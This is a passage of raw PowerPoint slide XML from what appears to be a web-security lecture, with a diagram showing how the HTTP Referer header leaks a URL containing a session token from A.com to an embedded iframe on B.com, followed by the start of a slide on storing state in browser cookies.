            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6853870" y="3852966"/>
            <a:ext cx="672028" cy="317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CE6DF8E4-E0A2-C64A-93DB-FB9940CF4159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6864888" y="4585535"/>
            <a:ext cx="672028" cy="317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59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P spid="8" grpId="0"/>
      <p:bldP spid="4"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8F9EBB97-3968-044C-B844-A24E6E305FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555557" y="1994803"/>
            <a:ext cx="5407479" cy="377190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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624310FE-A614-B043-94B1-00E452AD746C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2558403" y="2777441"/>
            <a:ext cx="1905000" cy="1103312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16390" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5252C2A3-4FB2-0D46-94FA-F17027B9824C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4463404" y="2956828"/>
            <a:ext cx="4314825" cy="401638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2718"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2718"/>
              <a:gd name="T13" fmla="*/ 0 h 253"/>
              <a:gd name="T14" fmla="*/ 2718 w 2718"/>
              <a:gd name="T15" fmla="*/ 253 h 253"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="2718" h="253">
                <a:moveTo>
                  <a:pt x="0" y="216"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="216"/>
                  <a:pt x="146" y="253"/>
                  <a:pt x="408" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="670" y="181"/>
                  <a:pt x="1187" y="2"/>
                  <a:pt x="1572" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1957" y="0"/>
                  <a:pt x="2479" y="167"/>
                  <a:pt x="2718" y="211"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>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94" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A64ED3-DD56-FB4E-AE84-C71A0B5D5A6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8461493" y="2798079"/>
            <a:ext cx="23460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err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/…/token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16395" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{909D8D88-4A65-C741-A507-767A33812AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4463403" y="3258454"/>
            <a:ext cx="4305300" cy="455613"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2712"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2712"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 287"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2712"/>
              <a:gd name="T13" fmla="*/ 0 h 287"/>
              <a:gd name="T14" fmla="*/ 2712 w 2712"/>
              <a:gd name="T15" fmla="*/ 287 h 287"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="2712" h="287">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="244"/>
                  <a:pt x="161" y="287"/>
                  <a:pt x="408" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="655" y="211"/>
                  <a:pt x="1098" y="30"/>
                  <a:pt x="1482" y="15"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1866" y="0"/>
                  <a:pt x="2456" y="129"/>
                  <a:pt x="2712" y="159"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="lg" len="lg"/>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96" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A45613-34A7-6646-BAAE-9B343E16E6BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5098403" y="2701242"/>
            <a:ext cx="1022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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16397" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4ED96F-F240-B944-82EF-DBCBA7330881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5371794" y="3544203"/>
            <a:ext cx="735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a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D281728A-C6D7-7246-88EE-C2118FCC53CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{047820F6-9ED1-A34C-B84D-4EC6172052AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8778228" y="3157647"/>
            <a:ext cx="2855583" cy="1103312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>B.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>” …&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92428FC2-F21A-6D4C-B138-0C2BF28C4673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340911" y="4942905"/>
            <a:ext cx="2855583" cy="1103312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96AF3DD4-8867-434A-99F1-4AE67875083C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7195305" y="4587304"/>
            <a:ext cx="1095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err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>B.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1279CA81-03E8-F245-8529-2F1D7FEE6382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419217" y="3983497"/>
            <a:ext cx="2882482" cy="1380141"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2718"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 2718"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 253"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 2718"/>
              <a:gd name="T13" fmla="*/ 0 h 253"/>
              <a:gd name="T14" fmla="*/ 2718 w 2718"/>
              <a:gd name="T15" fmla="*/ 253 h 253"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 1354 h 20012"/>
              <a:gd name="connsiteX1" fmla="*/ 1501 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 1393 h 20012"/>
              <a:gd name="connsiteX2" fmla="*/ 5018 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 20012 h 20012"/>
              <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY3" fmla="*/ 1156 h 20012"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8621"/>
              <a:gd name="connsiteY0" fmla="*/ 1354 h 34895"/>
              <a:gd name="connsiteX1" fmla="*/ 1501 w 8621"/>
              <a:gd name="connsiteY1" fmla="*/ 1393 h 34895"/>
              <a:gd name="connsiteX2" fmla="*/ 5018 w 8621"/>
              <a:gd name="connsiteY2" fmla="*/ 20012 h 34895"/>
              <a:gd name="connsiteX3" fmla="*/ 8621 w 8621"/>
              <a:gd name="connsiteY3" fmla="*/ 34895 h 34895"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 417 h 10029"/>
              <a:gd name="connsiteX1" fmla="*/ 1741 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 428 h 10029"/>
              <a:gd name="connsiteX2" fmla="*/ 7420 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 6157 h 10029"/>
              <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY3" fmla="*/ 10029 h 10029"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 446 h 10058"/>
              <a:gd name="connsiteX1" fmla="*/ 1741 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 457 h 10058"/>
              <a:gd name="connsiteX2" fmla="*/ 5525 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 6579 h 10058"/>
              <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY3" fmla="*/ 10058 h 10058"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 9612"/>
              <a:gd name="connsiteX1" fmla="*/ 5525 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 6133 h 9612"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 9612 h 9612"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 7749"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10245"/>
              <a:gd name="connsiteX1" fmla="*/ 3274 w 7749"/>
              <a:gd name="connsiteY1" fmla="*/ 6626 h 10245"/>
              <a:gd name="connsiteX2" fmla="*/ 7749 w 7749"/>
              <a:gd name="connsiteY2" fmla="*/ 10245 h 10245"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 5486 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 9900 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 4760 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 8862 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 4760 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 8862 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10000 h 10000"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10000" h="10000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1485" y="1298"/>
                  <a:pt x="2609" y="7234"/>
                  <a:pt x="4760" y="8862"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6841" y="9967"/>
                  <a:pt x="8684" y="9494"/>
                  <a:pt x="10000" y="10000"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>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5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43BDBB5A-4CA9-B843-8E23-77EFA2F2453E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3163027" y="4144073"/>
            <a:ext cx="2240096" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>GET … HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>200 323</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>A.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>/.../token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DC33D57-829E-1E49-A3E5-823511F4A193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1698237" y="5602286"/>
            <a:ext cx="4702563" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> leaks URL content (including session tokens) to any destination linked from the site</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7" name="Ink 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBAC1FA8-1592-6A4A-B3E5-9BCB70D52E8C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3050015" y="4634332"/>
              <a:ext cx="2206440" cy="761040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Ink 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBAC1FA8-1592-6A4A-B3E5-9BCB70D52E8C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3011855" y="4596172"/>
                <a:ext cx="2282400" cy="837000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333932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5" name="Rectangle 74">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77" name="Rectangle 76">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5122" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88272824-89A9-DF4E-85D0-59893B8B4FFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3310467" y="643467"/>
            <a:ext cx="5571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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1185117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DD944450-BFA3-BF4A-95DB-E4B2943DCACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92075" tIns="46038" rIns="92075" bIns="46038" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Storing State in Browser Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1256453" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE84D29-AB0D-D842-88AC-258691F5656B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
